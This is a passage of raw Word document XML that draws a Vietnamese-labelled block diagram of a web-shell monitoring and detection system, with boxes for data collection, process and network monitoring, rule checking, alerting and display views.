        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
                <wp:extent cx="5908040" cy="5074920"/>
                <wp:effectExtent l="2540" t="5080" r="13970" b="6350"/>
                <wp:docPr id="1" name="Group 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="11750" y="25875"/>
                          <a:ext cx="5908264" cy="5074786"/>
                          <a:chOff x="13900" y="30650"/>
                          <a:chExt cx="7616725" cy="4708125"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2" name="Shape 2"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1878806" y="30650"/>
                            <a:ext cx="3963600" cy="445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Hệ thống giám sát và phát hiện webShell</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3" name="Shape 3"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="221019" y="964381"/>
                            <a:ext cx="1525965" cy="483066"/>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Thu thập dữ liệu</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="6" name="Shape 4"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6101386" y="964381"/>
                            <a:ext cx="1525965" cy="522536"/>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hiển thị</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="7" name="Shape 5"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4190655" y="964381"/>
                            <a:ext cx="1525965" cy="490135"/>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cảnh báo</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="11" name="Shape 6"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2206246" y="964381"/>
                            <a:ext cx="1525965" cy="466571"/>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dữ liệu</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="12" name="Shape 7"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="204126" y="1485126"/>
                            <a:ext cx="1525907" cy="498985"/>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tiến trình</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="13" name="Shape 8"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="206283" y="2088982"/>
                            <a:ext cx="1525965" cy="514878"/>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truy cập file</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="14" name="Shape 9"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="204646" y="2679854"/>
                            <a:ext cx="1525965" cy="578501"/>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kết nối mạng</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="15" name="Shape 10"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2217707" y="2068363"/>
                            <a:ext cx="1525965" cy="370547"/>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Lưu dữ liệu</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="16" name="Shape 11"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2228350" y="1496343"/>
                            <a:ext cx="1525965" cy="514288"/>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Chuẩn hóa dữ liệu</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="18" name="Shape 12"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2218225" y="2538064"/>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cache</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="19" name="Shape 13"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2218225" y="312787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Sinh process tree</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="20" name="Shape 14"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4202116" y="1560555"/>
                            <a:ext cx="1526783" cy="370547"/>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Kiểm tra rule</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="21" name="Shape 15"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4206210" y="2051868"/>
                            <a:ext cx="1525965" cy="443007"/>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Sinh Alert</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="22" name="Shape 16"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6104660" y="1532867"/>
                            <a:ext cx="1525965" cy="370547"/>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Live Event</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="23" name="Shape 17"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6101350" y="200537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Alert view</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25" name="Shape 18"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6101350" y="252572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Process Tree</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="26" name="Shape 19"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6101350" y="3127863"/>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Event detail</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="27" name="Shape 20"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6101350" y="373002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White list</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="28" name="Shape 21"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6101350" y="436827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Search</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="29" name="Shape 22"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2218225" y="3717675"/>
                            <a:ext cx="1526100" cy="370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filter process</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="30" name="Straight Arrow Connector 30"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3860606" y="476150"/>
                            <a:ext cx="2400" cy="2382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 name="Straight Arrow Connector 31"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="820200" y="679275"/>
                            <a:ext cx="6076500" cy="351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2" name="Straight Arrow Connector 32"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="55300" y="1161775"/>
                            <a:ext cx="0" cy="16170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 name="Straight Arrow Connector 33"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm flipH="1">
                            <a:off x="13900" y="2066250"/>
                            <a:ext cx="55200" cy="276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4" name="Straight Arrow Connector 34"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="41475" y="1672463"/>
                            <a:ext cx="179700" cy="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35" name="Straight Arrow Connector 35"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="41483" y="2211699"/>
                            <a:ext cx="179700" cy="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36" name="Straight Arrow Connector 36"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="41466" y="2756549"/>
                            <a:ext cx="179700" cy="6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37" name="Straight Arrow Connector 37"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="830675" y="713150"/>
                            <a:ext cx="0" cy="2430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38" name="Straight Arrow Connector 38"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2888075" y="706239"/>
                            <a:ext cx="0" cy="2430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39" name="Straight Arrow Connector 39"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6862300" y="704875"/>
                            <a:ext cx="2100" cy="259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0" name="Straight Arrow Connector 40"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4945475" y="699329"/>
                            <a:ext cx="0" cy="2430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1" name="Straight Arrow Connector 41"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="75900" y="1149925"/>
                            <a:ext cx="145200" cy="42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 name="Straight Arrow Connector 42"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm flipH="1">
                            <a:off x="1969525" y="1098775"/>
                            <a:ext cx="13800" cy="28542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 name="Straight Arrow Connector 43"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1984150" y="1098775"/>
                            <a:ext cx="221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4" name="Straight Arrow Connector 44"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="1972750" y="17214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5" name="Straight Arrow Connector 45"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="1972750" y="21786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6" name="Straight Arrow Connector 46"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="1972750" y="27120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7" name="Straight Arrow Connector 47"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="1972750" y="33216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8" name="Straight Arrow Connector 48"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="1972750" y="3938111"/>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49" name="Straight Arrow Connector 49"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm flipH="1">
                            <a:off x="3959725" y="1098775"/>
                            <a:ext cx="4800" cy="10851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0" name="Straight Arrow Connector 50"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3965350" y="1098775"/>
                            <a:ext cx="221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 name="Straight Arrow Connector 51"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="3953950" y="17214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2" name="Straight Arrow Connector 52"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="3953950" y="21786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3" name="Straight Arrow Connector 53"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm flipH="1">
                            <a:off x="5841925" y="1098775"/>
                            <a:ext cx="27600" cy="34485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4" name="Straight Arrow Connector 54"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5870350" y="1098775"/>
                            <a:ext cx="221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 name="Straight Arrow Connector 55"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="5858950" y="17214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6" name="Straight Arrow Connector 56"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="5858950" y="21786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7" name="Straight Arrow Connector 57"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="5858950" y="27120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8" name="Straight Arrow Connector 58"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="5858950" y="33216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59" name="Straight Arrow Connector 59"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="5858950" y="3938111"/>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0" name="Straight Arrow Connector 60"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="5858950" y="4540800"/>
                            <a:ext cx="243900" cy="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399.6pt;width:465.2pt;" coordorigin="13900,30650" coordsize="7616725,4708125" o:gfxdata="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">
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:rect id="Shape 2" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:1878806;top:30650;height:445500;width:3963600;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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wobny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Hệ thống giám sát và phát hiện webShell</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 3" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:221019;top:964381;height:483066;width:1525965;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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jZMvn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Thu thập dữ liệu</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 4" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:6101386;top:964381;height:522536;width:1525965;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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zE2h/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hiển thị</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 5" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:4190655;top:964381;height:490135;width:1525965;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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cX83kuwAAANo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cảnh báo</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 6" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2206246;top:964381;height:466571;width:1525965;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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B20Lb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dữ liệu</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 7" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:204126;top:1485126;height:498985;width:1525907;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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cQncr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tiến trình</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 8" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:206283;top:2088982;height:514878;width:1525965;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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HkV5N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truy cập file</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 9" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:204646;top:2679854;height:578501;width:1525965;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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&#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kazhQ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Giám sát kết nối mạng</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 10" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2217707;top:2068363;height:370547;width:1525965;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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&#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uBE2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Lưu dữ liệu</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 11" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2228350;top:1496343;height:514288;width:1525965;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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DjLar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Chuẩn hóa dữ liệu</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 12" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2218225;top:2538064;height:370500;width:1526100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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EOHrRr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Quản lý cache</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 13" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2218225;top:3127875;height:370500;width:1526100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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&#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f61O3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Sinh process tree</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 14" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:4202116;top:1560555;height:370547;width:1526783;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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CD7Lf2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Kiểm tra rule</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 15" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:4206210;top:2051868;height:443007;width:1525965;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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Pt4hm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Sinh Alert</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 16" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:6104660;top:1532867;height:370547;width:1525965;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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ZRYR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Live Event</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 17" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:6101350;top:2005375;height:370500;width:1526100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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QKbOK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Alert view</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 18" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:6101350;top:2525725;height:370500;width:1526100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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MIyOZb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Process Tree</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 19" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:6101350;top:3127863;height:370500;width:1526100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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AXhAS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Event detail</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 20" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:6101350;top:3730025;height:370500;width:1526100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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rxK1ib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White list</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 21" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:6101350;top:4368275;height:370500;width:1526100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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N6NIfu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Search</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 22" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:2218225;top:3717675;height:370500;width:1526100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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scGEYL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4"/>
                            <w:vertAlign w:val="baseline"/>
                          </w:rPr>
                          <w:t>filter process</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:3860606;top:476150;height:238200;width:2400;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Af9ig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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:820200;top:679275;flip:x;height:35100;width:6076500;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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P4S7r6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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:55300;top:1161775;height:1617000;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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hjsey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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:13900;top:2066250;flip:x;height:27600;width:55200;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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7DbL+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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:41475;top:1672463;flip:x;height:6900;width:179700;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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31qI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41483;top:2211699;flip:x;height:6900;width:179700;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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BK5DRK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41466;top:2756549;flip:x;height:6900;width:179700;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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OJrk2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830675;top:713150;height:243000;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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b0C3u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2888075;top:706239;height:243000;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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qT7mc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endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:6862300;top:704875;height:259800;width:2100;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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FAxwH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4945475;top:699329;height:243000;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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AMP8bn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endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:75900;top:1149925;flip:x;height:4200;width:145200;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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KYUncO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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:1969525;top:1098775;flip:x;height:2854200;width:13800;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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DEdkG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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
